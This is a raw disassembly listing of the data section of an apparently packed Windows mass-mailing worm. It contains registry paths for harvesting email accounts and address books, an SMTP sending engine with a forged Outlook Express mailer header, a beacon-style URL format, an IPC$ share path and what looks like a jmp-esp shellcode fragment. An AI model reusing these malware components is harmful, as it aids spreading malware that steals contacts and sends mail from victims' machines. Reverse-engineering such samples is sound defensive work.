dword_424078 dd 77E76432h ; DATA XREF: sub_401FC0+A4�r
dword_42407C dd 77E73BEFh ; DATA XREF: sub_401FC0+5F�r
; sub_414280+6A�r
dword_424080 dd 77E78EAAh ; DATA XREF: sub_4021E0+191�r
dword_424084 dd 77E75E67h ; DATA XREF: sub_4021E0+DA�r
dword_424088 dd 77E75D9Eh ; DATA XREF: sub_4021E0+B6�r
dword_42408C dd 77E61BE6h ; DATA XREF: sub_4021E0+9D�r
; sub_402550+4B�r ...
dword_424090 dd 77E74155h ; DATA XREF: sub_4021E0+6A�r
; sub_4021E0+87�r ...
dword_424094 dd 77E74672h ; DATA XREF: sub_4021E0+54�r
; sub_4021E0+120�r ...
dword_424098 dd 77E73167h ; DATA XREF: sub_4021E0+44�r
; sub_4021E0+115�r
dword_42409C dd 77E6C0E3h ; DATA XREF: sub_4023D0+8F�r
; sub_402550+75�r
dword_4240A0 dd 77E715F7h ; DATA XREF: sub_4023D0+44�r
; sub_402550+29�r ...
dword_4240A4 dd 77E73163h ; DATA XREF: sub_4023D0+3D�r
; sub_402550+22�r ...
dword_4240A8 dd 77E79D8Ch ; DATA XREF: sub_4030C0+27F�r
; sub_4030C0+2C5�r ...
dword_4240AC dd 77E71AFEh ; DATA XREF: sub_4030C0+115�r
dword_4240B0 dd 77E684C6h ; DATA XREF: sub_4033F0+4FA�r
; sub_40BF40+1A2�r ...
dword_4240B4 dd 77E705FCh ; DATA XREF: sub_4033F0+1D3�r
; sub_409710+77�r
dword_4240B8 dd 77E77CC4h ; DATA XREF: sub_405390+42�r
; sub_40B1E0+15�r ...
dword_4240BC dd 77E793EFh ; DATA XREF: sub_405940+1F2�r
; UPX0:00406F85�r ...
dword_4240C0 dd 77EBAAFAh ; DATA XREF: sub_4191AA�r
dword_4240C4 dd 77E7FF2Eh ; DATA XREF: sub_421E10:loc_421E63�r
; sub_421E8C:loc_421EE2�r
dword_4240C8 dd 77EBB1E7h ; DATA XREF: sub_4191B6�r
dword_4240CC dd 77E80656h ; DATA XREF: sub_405940+4E�r
; sub_41AD1F+27�r ...
dword_4240D0 dd 77E77C4Ch ; DATA XREF: sub_4061E0+70�r
; sub_414280+85�r ...
dword_4240D4 dd 77E61608h ; DATA XREF: sub_4061E0+60�r
; sub_414280+75�r ...
dword_4240D8 dd 77E74A3Bh ; DATA XREF: sub_406AE0+61�r
; sub_419180+3�r
dword_4240DC dd 77E79D5Bh ; DATA XREF: sub_406AE0+38�r
; sub_40C950+BA�r ...
dword_4240E0 dd 77E737DEh ; DATA XREF: sub_406B60+65�r
; sub_419130+14�r
dword_4240E4 dd 77E7751Ah ; DATA XREF: sub_406CE0+3�r
; sub_408780+43�r ...
dword_4240E8 dd 77E75090h ; DATA XREF: UPX0:00406FEB�r
; sub_407140+1F5�r
dword_4240EC dd 77E74D76h ; DATA XREF: UPX0:00406F7A�r
; sub_407140+D8�r
dword_4240F0 dd 77E77797h ; DATA XREF: UPX0:00406F69�r
; sub_407140+C5�r
dword_4240F4 dd 77E7980Ah ; DATA XREF: sub_407140+147�r
; sub_40AEA0+32�r ...
dword_4240F8 dd 77E79E34h ; DATA XREF: sub_4073E0+17�r
; sub_40B140+21�r ...
dword_4240FC dd 77E77CCEh ; DATA XREF: sub_408FC0+DD�r
; sub_4091D0+1A4�r ...
dword_424100 dd 77E7A5FDh ; DATA XREF: sub_408FC0+95�r
; sub_4091D0+CD�r ...
dword_424104 dd 77E805D8h ; DATA XREF: sub_408FC0+76�r
; sub_4091D0+9E�r ...
dword_424108 dd 77E7C657h ; DATA XREF: sub_408FC0+53�r
; sub_4091D0+74�r ...
dword_42410C dd 77E79924h ; DATA XREF: sub_4091D0+28C�r
; sub_41C18B+22D�r ...
dword_424110 dd 77E6BD13h ; DATA XREF: sub_409710+28D�r
; sub_409E30+302�r ...
dword_424114 dd 77E6808Fh ; DATA XREF: sub_409710+112�r
; sub_40BC80+1A2�r ...
dword_424118 dd 77E80618h ; DATA XREF: sub_40A7C0+273�r
; sub_413870+20�r
dword_42411C dd 77E7C2C4h ; DATA XREF: sub_40BA20+3C�r
; sub_4190C0+9�r
dword_424120 dd 77E8074Ah ; DATA XREF: sub_40BA20+19�r
dword_424124 dd 77E705C5h ; DATA XREF: sub_40BC80+1AD�r
; sub_40BF40+169�r ...
dword_424128 dd 77E704FCh ; DATA XREF: sub_40BF40+3A�r
dword_42412C dd 77F5157Dh ; DATA XREF: sub_40F2E0+68�r
; sub_40F3B0+71�r ...
dword_424130 dd 77E79F93h ; DATA XREF: sub_4137C0+4�r
; start-657AC�r ...
dword_424134 dd 77E76E3Dh ; DATA XREF: sub_414690+26D�r
dword_424138 dd 77E70F89h ; DATA XREF: sub_414690+25F�r
dword_42413C dd 77E76A2Eh ; DATA XREF: sub_415AE0+D6�r
dword_424140 dd 77E7AC37h ; DATA XREF: sub_419070+2E�r
dword_424144 dd 77E79C90h ; DATA XREF: sub_41EA9D+27�r
dword_424148 dd 77E776A0h ; DATA XREF: sub_419120+3�r
dword_42414C dd 77E74A69h ; DATA XREF: sub_419190+A�r
dword_424150 dd 77E79C3Dh ; DATA XREF: sub_41FB3B+14E�r
; sub_4202A3+188�r
dword_424154 dd 77E7C9E7h ; DATA XREF: sub_41EC64+5�r
; sub_41EC77+6�r
dword_424158 dd 77F522F2h ; DATA XREF: sub_41EBA0+5A�r
dword_42415C dd 77E616B4h ; DATA XREF: sub_41EA9D+2E�r
dword_424160 dd 77E73196h ; DATA XREF: sub_42151E+C�r
dword_424164 dd 77F5722Fh ; DATA XREF: sub_41D50E+27�r
; sub_41E82C+137�r ...
dword_424168 dd 77E7C726h ; DATA XREF: sub_41D132+11�r
dword_42416C dd 77E76E0Bh ; DATA XREF: sub_41D132+44�r
dword_424170 dd 77E73FF9h ; DATA XREF: sub_42218A+57�r
dword_424174 dd 77E70192h ; DATA XREF: sub_422A31+EE�r
dword_424178 dd 77EBA994h ; DATA XREF: sub_4191B0�r
dword_42417C dd 77F53275h ; DATA XREF: sub_41CFDD+1�r
; sub_41AB1A+5B2B�r
dword_424180 dd 77E781F9h ; DATA XREF: sub_41C18B+27�r
; sub_41C18B+15B�r ...
dword_424184 dd 77E77405h ; DATA XREF: sub_41C18B+2C3�r
; sub_41C18B+344�r ...
dword_424188 dd 77E7F044h ; DATA XREF: sub_41C0A8+1A�r
; sub_41C0A8+71�r ...
dword_42418C dd 77E75CB5h ; DATA XREF: sub_419224+8B�r
; sub_41E9D9+29�r
dword_424190 dd 77F6183Eh ; DATA XREF: sub_422EE0�r
dword_424194 dd 77E6167Bh ; DATA XREF: sub_419875+9�r
; sub_41AD1F+1B�r
dword_424198 dd 77F516F8h ; DATA XREF: sub_419D24+63�r
; sub_41D183+D�r ...
dword_42419C dd 77F51597h ; DATA XREF: sub_419DDD+65�r
; sub_41D1F6+2B4�r ...
dword_4241A0 dd 77E6D706h ; DATA XREF: sub_41A2B3+2E�r
dword_4241A4 dd 77E6177Ah ; DATA XREF: start-656C0�r
; sub_4202A3+5D�r
dword_4241A8 dd 77E7C938h ; DATA XREF: start:loc_41A5FC�r
dword_4241AC dd 77F7E21Fh ; DATA XREF: sub_41AB2E+28�r
; sub_41AB5D+1C�r ...
dword_4241B0 dd 77F7E300h ; DATA XREF: sub_41AB80+28�r
; sub_41ABAF+1C�r ...
dword_4241B4 dd 77E802FCh ; DATA XREF: sub_41AD1F+43�r
dword_4241B8 dd 77E7A099h ; DATA XREF: UPX0:0041AE06�r
; sub_41FB3B+81�r ...
dword_4241BC dd 77E7C5B4h ; DATA XREF: sub_41B30A�r
dword_4241C0 dd 77F51587h ; DATA XREF: sub_41B330+66�r
; sub_421D85+79�r
dword_4241C4 dd 77E72B29h ; DATA XREF: sub_41B4E8+7B�r
dword_4241C8 dd 77E79B39h ; DATA XREF: sub_41B4E8+71�r
dword_4241CC dd 77E78B61h ; DATA XREF: sub_41B4E8+67�r
dword_4241D0 dd 77E6169Ah ; DATA XREF: sub_41C0A8+D5�r
dword_4241D4 dd 77E7C3A5h ; DATA XREF: sub_41C0A8+2B�r
dd 0
dword_4241DC dd 772D4365h ; DATA XREF: sub_414280+2F�r
; sub_414690+93C�r
dd 0
dword_4241E4 dd 77D4CBFFh ; DATA XREF: sub_401FC0+6A�r
dword_4241E8 dd 77D4BDCAh ; DATA XREF: sub_405510+26�r
; sub_4056D0+2C�r
dword_4241EC dd 77D651AFh ; DATA XREF: sub_405510+19�r
; sub_4056D0+44�r ...
dword_4241F0 dd 77D472ECh ; DATA XREF: sub_411F80+E�r
dword_4241F4 dd 77D4C96Ah ; DATA XREF: sub_40A2D0+FD�r
; sub_415CE0+1BB�r ...
dword_4241F8 dd 77D4702Fh ; DATA XREF: sub_405510+12�r
; sub_4056D0+1E�r
align 10h
dword_424200 dd 76206B7Fh ; DATA XREF: sub_4030C0+169�r
; sub_4033F0+35E�r ...
dword_424204 dd 76204E4Dh ; DATA XREF: sub_402FE0+76�r
; sub_4030C0+2DC�r ...
dword_424208 dd 762059A3h ; DATA XREF: sub_402FE0+53�r
; sub_4030C0+1B2�r ...
dword_42420C dd 762211EFh ; DATA XREF: sub_40BAE0+1A�r
dword_424210 dd 7620AFB6h ; DATA XREF: sub_4030C0+143�r
; sub_4033F0+33D�r ...
dword_424214 dd 7620BD61h ; DATA XREF: sub_402FE0+89�r
; sub_4030C0+258�r ...
dword_424218 dd 76208162h ; DATA XREF: sub_4030C0:loc_403295�r
; sub_4033F0:loc_4037A5�r
dword_42421C dd 76206853h ; DATA XREF: sub_402FE0+4D�r
; sub_4030C0+1A2�r ...
dd 0
dword_424224 dd 71AB155Ah ; DATA XREF: sub_422ED4�r
dword_424228 dd 71AB4122h ; DATA XREF: sub_422ECE�r
dword_42422C dd 71ABD969h ; DATA XREF: sub_422EDA�r
dword_424230 dd 71AB12A7h ; DATA XREF: sub_4109A0+82�r
dword_424234 dd 71AB1746h ; DATA XREF: sub_40F2E0+AE�r
; sub_4108F0+14�r ...
dword_424238 dd 71AB1836h ; DATA XREF: sub_40CBE0+A�r
dword_42423C dd 71AB41DAh ; DATA XREF: sub_40C7C0+44�r
dword_424240 dd 71AB1740h ; DATA XREF: sub_4082D0:loc_408313�r
; sub_40F2E0+36�r ...
dword_424244 dd 71AB12A7h ; DATA XREF: sub_407E70+30�r
dword_424248 dd 71AB3ECEh ; DATA XREF: sub_407E70+55�r
dword_42424C dd 71AB12F8h ; DATA XREF: sub_407E70+76�r
; sub_40BA70+34�r ...
dword_424250 dd 71AB350Dh ; DATA XREF: sub_407E70+86�r
; sub_40F1E0+60�r
dword_424254 dd 71AB3F8Dh ; DATA XREF: sub_407E30+2�r
; sub_4105E0+6E�r ...
dword_424258 dd 71AB401Ch ; DATA XREF: sub_404DB0+3E�r
; sub_405390+92�r ...
dword_42425C dd 71AB5690h ; DATA XREF: sub_404DB0+2E9�r
; sub_404DB0+4D6�r ...
dword_424260 dd 71AB3C22h ; DATA XREF: sub_404B60+1C�r
; sub_404DB0+279�r ...
dword_424264 dd 71AB1746h ; DATA XREF: sub_404B60+46�r
; sub_404C60+46�r ...
dword_424268 dd 71AB3E5Dh ; DATA XREF: sub_404B60+6A�r
; sub_404DB0+2BC�r ...
dword_42426C dd 71AB1A6Dh ; DATA XREF: sub_404B60+75�r
; sub_404B60+D9�r ...
dword_424270 dd 71AB1890h ; DATA XREF: sub_404B60+AE�r
; sub_411F44�r
dword_424274 dd 71AB1AF4h ; DATA XREF: sub_404B60+D0�r
; sub_404DB0+2CB�r ...
dword_424278 dd 71AB32CAh ; DATA XREF: sub_404800+3B�r
; sub_409C50+3B�r ...
dword_42427C dd 71AB2BBFh ; DATA XREF: sub_404800+4A�r
; sub_409C50+4A�r ...
dd 0Bh dup(0)
off_4242AC dd offset loc_4023B0 ; DATA XREF: sub_401CF0+F�o
; sub_401D10+9�o
dd offset sub_4023D0
align 8
byte_4242B8 db 0 ; DATA XREF: sub_401D60+55�r
; sub_401D60+74�r ...
align 4
dd 7 dup(0)
dd 200h, 2 dup(0)
dd 20200h, 2 dup(1010101h), 101h, 0
dd 1010102h, 5 dup(1010101h), 10101h, 2000000h, 1010100h
dd 5 dup(1010101h), 10101h, 21h dup(0)
dword_4243B8 dd 6C70h ; DATA XREF: sub_401FC0+1DA�o
word_4243BC dw 5Ch ; DATA XREF: sub_4021E0+60�o
; sub_4021E0+12C�o ...
align 10h
word_4243C0 dw 5C3Ah ; DATA XREF: sub_4023D0+82�r
; sub_402550:loc_4025A3�r
byte_4243C2 db 0 ; DATA XREF: sub_4023D0+89�r
; sub_402550+59�r
byte_4243C3 db 0 ; DATA XREF: sub_4023D0+4D�o
; sub_403950+46B�o ...
off_4243C4 dd offset loc_402780 ; DATA XREF: sub_4024F0+17�o
; sub_402520�o
dd offset sub_402550
off_4243CC dd offset loc_403930 ; DATA XREF: sub_4027A0+31�o
; sub_402880+4�o
dd offset sub_403950
dword_4243D4 dd 6564726Fh ; DATA XREF: sub_4028F0+59�r
dword_4243D8 dd 702E3272h ; DATA XREF: sub_4028F0+66�r
word_4243DC dw 7068h ; DATA XREF: sub_4028F0+6F�r
byte_4243DE db 0 ; DATA XREF: sub_4028F0+79�r
align 10h
dword_4243E0 dd 6564726Fh ; DATA XREF: sub_4028F0+3A�r
dword_4243E4 dd 68702E72h ; DATA XREF: sub_4028F0+45�r
word_4243E8 dw 70h ; DATA XREF: sub_4028F0+4E�r
align 4
word_4243EC dw 2Eh ; DATA XREF: sub_4030C0+98�r
; sub_4033F0+14A�r ...
align 10h
dword_4243F0 dd 6425h ; DATA XREF: sub_4030C0+64�o
; sub_4033F0+66�o ...
dword_4243F4 dd 0A092C20h, 0 ; DATA XREF: sub_403950+868�o
; sub_403950:loc_4041E0�o ...
a?aDD00DDS04x db '?a=%d&d=0:0:%d:%d:%s:%04x',0 ; DATA XREF: sub_403950+603�o
align 4
word_424418 dw 2Fh ; DATA XREF: sub_403950+1F8�r
align 4
dword_42441C dd 2E666D77h, 32302530h, 64h ; DATA XREF: sub_403950+D3�o
off_424428 dd offset loc_404D00 ; DATA XREF: sub_404A40+1D�o
; sub_404A70�o
dd offset sub_405390
dword_424430 dd 73255C5Ch, 6370695Ch, 24h ; DATA XREF: sub_404DB0+49�o
dword_42443C dd 1CEC8166h ; DATA XREF: sub_404DB0+20�r
dword_424440 dd 0E4FF07h ; DATA XREF: sub_404DB0+28�r
off_424444 dd offset loc_405580 ; DATA XREF: sub_405470+17�o
; sub_4054A0�o
dd offset sub_405510
off_42444C dd offset loc_405780 ; DATA XREF: sub_4055A0+17�o
; sub_4055D0�o
dd offset sub_4056D0
word_424454 dw 4B4Fh ; DATA XREF: sub_4055E0+BB�r
byte_424456 db 0 ; DATA XREF: sub_4055E0+CB�r
align 4
off_424458 dd offset sub_405C60 ; DATA XREF: sub_4057A0+A�o
; sub_405880+E�o
word_42445C dw 2Ch ; DATA XREF: sub_4062A0+27D�r
align 10h
off_424460 dd offset loc_406C90 ; DATA XREF: sub_406B60+1B�o
; sub_406C20+1D�o ...
off_424464 dd offset loc_407120 ; DATA XREF: sub_406D00+C�o
; UPX0:00407128�o
off_424468 dd offset loc_4075B0 ; DATA XREF: sub_407090+17�o
; UPX0:00407378�o ...
dd offset sub_407110
word_424470 dw 3532h ; DATA XREF: sub_407640+6E2�r
; UPX0:off_429FD0�o
byte_424472 db 0 ; DATA XREF: sub_407640+6DD�r
align 4
off_424474 dd offset loc_407F10 ; DATA XREF: UPX0:00407F18�o
; sub_407F30�o ...
off_424478 dd offset loc_408350 ; DATA XREF: UPX0:0040835B�o
; sub_4083A0+B�o ...
off_42447C dd offset loc_4086C0 ; DATA XREF: UPX0:004086C6�o
; sub_408A20+1E�o
off_424480 dd offset loc_408330 ; DATA XREF: sub_4082D0+10�o
off_424484 dd offset loc_4086A0 ; DATA XREF: sub_408780+39�o
; sub_410810+29�o ...
dd offset sub_4083E0
off_42448C dd offset loc_408760 ; DATA XREF: sub_408740+1�o
; sub_408780+9C�o ...
off_424490 dd offset loc_4088E0 ; DATA XREF: sub_408780+A�o
; sub_408900+1F�o
off_424494 dd offset loc_408FA0 ; DATA XREF: sub_408B20+2D�o
; sub_408ED0+1E�o
dd offset sub_408C40
word_42449C dw 5C5Ch ; DATA XREF: sub_4091D0+13F�r
byte_42449E db 0 ; DATA XREF: sub_4091D0:loc_409309�r
align 10h
off_4244A0 dd offset loc_409A20 ; DATA XREF: sub_4096D0+1A�o
; sub_409700�o
dd offset sub_409710
off_4244A8 dd offset loc_409E10 ; DATA XREF: sub_409DB0+1A�o
; sub_409DE0�o
dd offset sub_409E30
off_4244B0 dd offset sub_40A680 ; DATA XREF: sub_40A650+9�o
; sub_40A680+8�o
aSoftwareMicros db 'Software\Microsoft\Internet Account Manager\Accounts\',0
; DATA XREF: sub_40A2D0+18�o
align 4
aSoftwareMicr_0 db 'Software\Microsoft\WAB\DLLPath',0 ; DATA XREF: sub_40A6A0+48�o
align 4
off_42450C dd offset sub_40AA40 ; DATA XREF: sub_40A6A0+17�o
; sub_40AA40+1E�o
off_424510 dd offset loc_40AC30 ; DATA XREF: sub_40AA90+34�o
; sub_40AB20+1D�o
dd offset sub_40ABB0
word_424518 dw 3020h ; DATA XREF: sub_40BF40+1C8�r
; sub_40BF40+438�r
byte_42451A db 0 ; DATA XREF: sub_40BF40+1CF�r
; sub_40BF40+43F�r
align 4
word_42451C dw 3120h ; DATA XREF: sub_40BF40+189�r
; sub_40BF40+3F8�r
byte_42451E db 0 ; DATA XREF: sub_40BF40+18F�r
; sub_40BF40+3FE�r
align 10h
off_424520 dd offset loc_40CD80 ; DATA XREF: sub_40C480+1A�o
; sub_40CBE0+4�o
word_424524 dw 2121h ; DATA XREF: sub_40CDA0+402�r
byte_424526 db 0 ; DATA XREF: sub_40CDA0+409�r
align 4
word_424528 dw 6948h ; DATA XREF: sub_40CDA0+80�r
byte_42452A db 0 ; DATA XREF: sub_40CDA0+7A�r
align 4
word_42452C dw 654Dh ; DATA XREF: sub_40E8B0+86�r
byte_42452E db 0 ; DATA XREF: sub_40E8B0+95�r
align 10h
word_424530 dw 656Dh ; DATA XREF: sub_40E8B0+7A�r
byte_424532 db 0 ; DATA XREF: sub_40E8B0+80�r
align 4
off_424534 dd offset loc_40F910 ; DATA XREF: sub_40F6D0+E�o
; UPX0:0040F918�o ...
dd offset sub_4109A0
dd offset sub_40F730
dd offset nullsub_2
word_424544 dw 0Ah ; DATA XREF: sub_40F730+78�r
; sub_40F730+10E�r ...
align 4
off_424548 dd offset loc_40F9E0 ; DATA XREF: sub_40FA00+B�o
; sub_410490+AC�o
dd offset loc_40F930
dd offset sub_40F730
dd offset sub_40F980
off_424558 dd offset loc_410B70 ; DATA XREF: sub_40FA30+16�o
dd offset sub_410A50
dd offset sub_40FA60
dd offset sub_40FC20
off_424568 dd offset loc_410B70 ; DATA XREF: sub_40FC50+D�o
dd offset sub_40FC70
dd offset sub_40FCA0
dd offset sub_40FEF0
off_424578 dd offset loc_410B70 ; DATA XREF: sub_40FDC0+D�o
dd offset sub_410AC0
dd offset sub_40FDE0
dd offset sub_40FEF0
word_424588 dw 3D41h ; DATA XREF: sub_40FDE0+88�r
byte_42458A db 0 ; DATA XREF: sub_40FDE0+91�r
align 4
off_42458C dd offset loc_410B70 ; DATA XREF: sub_40FF10+D�o
dd offset sub_40FC70
dd offset sub_40FF30
dd offset sub_40FEF0
dword_42459C dd 584Dh ; DATA XREF: sub_410030:loc_410407�o
; sub_411AF0+CE�o
dword_4245A0 dd 524Dh ; DATA XREF: sub_410030:loc_410207�o
dword_4245A4 dd 474Dh ; DATA XREF: sub_410030:loc_4101DF�o
dword_4245A8 dd 424Dh ; DATA XREF: sub_410030:loc_4101B7�o
dword_4245AC dd 464Dh ; DATA XREF: sub_410030:loc_4100D6�o
dword_4245B0 dd 444Dh ; DATA XREF: sub_410030:loc_4100AF�o
dword_4245B4 dd 534Eh ; DATA XREF: sub_410030:loc_410088�o
dword_4245B8 dd 41h, 746153h, 697246h, 756854h, 646557h, 657554h, 6E6F4Dh
; DATA XREF: sub_410030+31�o
; UPX0:00429FC8�o ...
dword_4245D4 dd 6E7553h ; DATA XREF: UPX0:off_429FB0�o
; UPX0:off_42AB18�o
dword_4245D8 dd 2D4F5349h, 39353838h, 312Dh, 69647473h, 78742E6Eh, 74h
; DATA XREF: UPX0:off_429FAC�o
; UPX0:00429FA8�o
dword_4245F0 dd 69616C70h ; DATA XREF: sub_412210:loc_41252C�r
; sub_412CA0+33C�o
word_4245F4 dw 6Eh ; DATA XREF: sub_412210+322�r
align 4
dword_4245F8 dd 6C6D7468h ; DATA XREF: sub_412210+304�r
byte_4245FC db 0 ; DATA XREF: sub_412210+309�r
align 10h
dword_424600 dd 2D2Dh ; DATA XREF: sub_412860:loc_412A07�o
; sub_412860+1D1�o ...
aContentTransfe db 'Content-Transfer-Encoding: BASE64',0Dh,0Ah,0
; DATA XREF: sub_412860+1A0�o
aContentDisposi db 'Content-Disposition: ATTACHMENT;',0Dh,0Ah ; DATA XREF: sub_412860+180�o
db ' filename="%s"',0Dh,0Ah,0
align 4
word_42465C dw 0A0Dh ; DATA XREF: sub_412860+BA�o
; sub_412860+C4�o ...
byte_42465E db 0 ; DATA XREF: sub_412CA0+154�r
; sub_412CA0+234�r ...
align 10h
dword_424660 dd 303131h ; DATA XREF: UPX0:00429FCC�o
dword_424664 dd 6D617263h, 35646D2Dh, 0 ; DATA XREF: sub_412CA0+377�o
aLogin db 'login',0 ; DATA XREF: sub_412CA0+357�o
align 4
aAuth db 'auth',0 ; DATA XREF: sub_412CA0+2EB�o
align 10h
aHeloS db 'HELO %s',0 ; DATA XREF: sub_412CA0+1A8�o
aEhloS db 'EHLO %s',0 ; DATA XREF: sub_412CA0+CD�o
aSmtp db 'smtp',0 ; DATA XREF: sub_412CA0+7E�o
align 4
aSmtpServerErro db 'SMTP server error accepting message data',0 ; DATA XREF: sub_4130B0+2E9�o
align 4
aData db 'DATA',0Dh,0Ah,0 ; DATA XREF: sub_4130B0+2C2�o
align 4
aRcptToS db 'RCPT TO:<%s>',0 ; DATA XREF: sub_4130B0+215�o
align 10h
aNoEmailAddre_0 db 'No email address was found for recipients.',0Ah
; DATA XREF: sub_4130B0+1C8�o
db 'Have you set the ',27h,'To:',27h,' field correctly?',0
align 8
aTheSmtpServerD db 'The SMTP server does not like the sender name.',0Ah
; DATA XREF: sub_4130B0+158�o
db 'Have you set your mail address correctly?',0
align 4
aMailFromS db 'MAIL FROM:<%s>',0 ; DATA XREF: sub_4130B0:loc_413189�o
align 4
aMailFromS_0 db 'MAIL FROM:%s',0 ; DATA XREF: sub_4130B0+CD�o
align 8
aNoEmailAddress db 'No email address was found for the sender name.',0Ah
; DATA XREF: sub_4130B0+BD�o
db 'Have you set your mail address correctly?',0
align 4
a_ db '.',0Dh,0Ah,0 ; DATA XREF: sub_4138E0+EC�o
a__0 db 0Dh,0Ah ; DATA XREF: sub_4138E0+E3�o
db '.',0Dh,0Ah,0
align 10h
asc_424820: ; DATA XREF: sub_4138E0+A3�o
dw 0Dh
unicode 0, <>,0
asc_424824 db 0Dh,0Dh,0Ah,0 ; DATA XREF: sub_4138E0+76�o
asc_424828 db 0Dh,0Ah ; DATA XREF: sub_4138E0+14�o
db 0Dh,0Ah,0
align 10h
a1 db '-1',0 ; DATA XREF: sub_4139F0:loc_413AB7�o
align 4
aInfinite db 'INFINITE',0 ; DATA XREF: sub_4139F0:loc_413A9B�o
align 10h
aThrice db 'THRICE',0 ; DATA XREF: sub_4139F0:loc_413A7D�o
align 4
aTwice db 'TWICE',0 ; DATA XREF: sub_4139F0:loc_413A5F�o
align 10h
aOnce db 'ONCE',0 ; DATA XREF: sub_4139F0:loc_413A41�o
align 4
aU_U_U db '%u.%u.%u',0 ; DATA XREF: sub_413B10+639�o
align 4
aQuit db 'QUIT',0Dh,0Ah,0 ; DATA XREF: sub_4141C0+9�o
; sub_4141F0+8�o ...
align 4
aDec db 'Dec',0 ; DATA XREF: UPX0:0042A000�o
; UPX0:0042AB7C�o
aNov db 'Nov',0 ; DATA XREF: UPX0:00429FFC�o
; UPX0:0042AB78�o
aOct db 'Oct',0 ; DATA XREF: UPX0:00429FF8�o
; UPX0:0042AB74�o
aSep db 'Sep',0 ; DATA XREF: UPX0:00429FF4�o
; UPX0:0042AB70�o
aAug db 'Aug',0 ; DATA XREF: UPX0:00429FF0�o
; UPX0:0042AB6C�o
aJul db 'Jul',0 ; DATA XREF: UPX0:00429FEC�o
; UPX0:0042AB68�o
aJun db 'Jun',0 ; DATA XREF: UPX0:00429FE8�o
; UPX0:0042AB64�o
aMay db 'May',0 ; DATA XREF: UPX0:00429FE4�o
; UPX0:0042AB60�o ...
aApr db 'Apr',0 ; DATA XREF: UPX0:00429FE0�o
; UPX0:0042AB5C�o
aMar db 'Mar',0 ; DATA XREF: UPX0:00429FDC�o
; UPX0:0042AB58�o
aFeb db 'Feb',0 ; DATA XREF: UPX0:00429FD8�o
; UPX0:0042AB54�o
aJan db 'Jan',0 ; DATA XREF: UPX0:00429FD4�o
; UPX0:0042AB50�o
aAbcdefghijkl_0 db 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789',0
align 4
aMessageId04x08 db 'Message-ID: <%04x%08.8lx$%08.8lx$%s@%s>',0Dh,0Ah,0
; DATA XREF: sub_414280+C2�o
align 4
aLocalhost db 'LocalHost',0 ; DATA XREF: sub_414280+5D�o
align 4
a08x db '%08x',0 ; DATA XREF: sub_414280+3F�o
align 4
asc_42491C db 0Dh,0Ah ; DATA XREF: sub_414370+203�o
; sub_414370+288�o
db ' ',0
a_nextpart db '----=_NextPart',0 ; DATA XREF: sub_414690+CBB�o
align 10h
aContentTypeTex db 'Content-Type: text/%s; charset=%s',0Dh,0Ah,0
; DATA XREF: sub_414690+B8C�o
aContentTrans_0 db 'Content-Transfer-Encoding: 7BIT',0Dh,0Ah,0
; DATA XREF: sub_414690:loc_4151CB�o
; sub_414690+B67�o ...
align 4
aThisIsAMultiPa db 0Dh,0Ah ; DATA XREF: sub_414690+AE9�o
; sub_414690+B1B�o
db 'This is a multi-part message in MIME format.',0Dh,0Ah,0
align 4
asc_4249AC: ; DATA XREF: sub_414690+AA9�o
; sub_414690+ADB�o
unicode 0, <">,0
aBoundary db ' boundary="',0 ; DATA XREF: sub_414690+A24�o
; sub_414690+A56�o
aMultipartMixed db ' multipart/mixed;',0Dh,0Ah,0 ; DATA XREF: sub_414690+9E4�o
; sub_414690+A16�o
aContentType db 'Content-Type:',0 ; DATA XREF: sub_414690+9A4�o
; sub_414690+9D6�o
align 10h
aMimeVersion1_0 db 'MIME-Version: 1.0',0Dh,0Ah,0 ; DATA XREF: sub_414690+96E�o
; sub_414690+996�o
a_nextpart_03d_ db '----=_NextPart_%03d_%04X_%08.8lX.%08.8lX',0 ; DATA XREF: sub_414690+92A�o
align 10h
asc_424A20 db ' "',0 ; DATA XREF: sub_414690+813�o
align 4
aSubject db 'Subject: ',0 ; DATA XREF: sub_414690+7FD�o
align 10h
aXMailerMicroso db 'X-Mailer: Microsoft Outlook Express 6.00.2900.2180',0Ah,0
; DATA XREF: sub_414690:loc_414D5F�o
aUserAgentMicro db 'User-Agent: Microsoft Outlook Express 6.00.2900.2180',0Ah,0
; DATA XREF: sub_414690+6C0�o
align 4
aReturnPathS db 'Return-Path: %s',0Dh,0Ah,0 ; DATA XREF: sub_414690+699�o
align 10h
aXMsmailPrior_0 db 'X-MSMail-Priority: High',0Dh,0Ah ; DATA XREF: sub_414690+677�o
db 'X-Priority: 1',0Dh,0Ah,0
align 4
aXMsmailPriorit db 'X-MSMail-Priority: Low',0Dh,0Ah ; DATA XREF: sub_414690+66C�o
db 'X-Priority: 5',0Dh,0Ah,0
aReturnReceiptT db 'Return-Receipt-To: %s',0Dh,0Ah,0 ; DATA XREF: sub_414690+645�o
aDispositionNot db 'Disposition-Notification-To: %s',0Dh,0Ah,0 ; DATA XREF: sub_414690+603�o
align 10h
aCc db 'Cc: ',0 ; DATA XREF: sub_414690+5AA�o
align 4
aToUndisclosedR db 'To: Undisclosed recipients:;',0Dh,0Ah,0 ; DATA XREF: sub_414690+57F�o
align 4
aTo db 'To: ',0 ; DATA XREF: sub_414690+534�o
align 10h
aReplyToS db 'Reply-To: %s',0Dh,0Ah,0 ; DATA XREF: sub_414690+4E2�o
align 10h
aReplyToS_0 db 'Reply-to: %s',0Dh,0Ah,0 ; DATA XREF: sub_414690+497�o
align 10h
aSenderS db 'Sender: %s',0Dh,0Ah,0 ; DATA XREF: sub_414690+46F�o
; sub_414690+4B6�o
align 10h
aSS_2dS_2d_2d_2 db '%s%s, %.2d %s %.2d %.2d:%.2d:%.2d %+03d%02d',0Dh,0Ah,0
; DATA XREF: sub_414690+439�o
align 10h
aFromS db 'From: %s',0Dh,0Ah,0 ; DATA XREF: sub_414690+381�o
align 4
aDateS_2dS_4d_2 db 'Date: %s, %.2d %s %.4d %.2d:%.2d:%.2d %+03d%02d',0Dh,0Ah,0
; DATA XREF: sub_414690+2F6�o
align 10h
aS db '<%s>',0 ; DATA XREF: sub_414690+1D7�o
align 4
aUnspecified db '<unspecified>',0 ; DATA XREF: sub_415460:loc_415639�o
align 4
aContentTypeT_0 db 'Content-Type: text/%s; charset=%s',0Dh,0Ah ; DATA XREF: sub_415460+153�o
db 0Dh,0Ah,0
align 10h
aContentDescrip db 'Content-description: Mail message body',0Dh,0Ah,0
; DATA XREF: sub_415460+12D�o
align 4
aThisIsAMulti_0 db 'This is a multi-part message in MIME format.',0
; DATA XREF: sub_415460+A7�o
align 4
asc_424CAC db 0Ah ; DATA XREF: sub_415460+7A�o
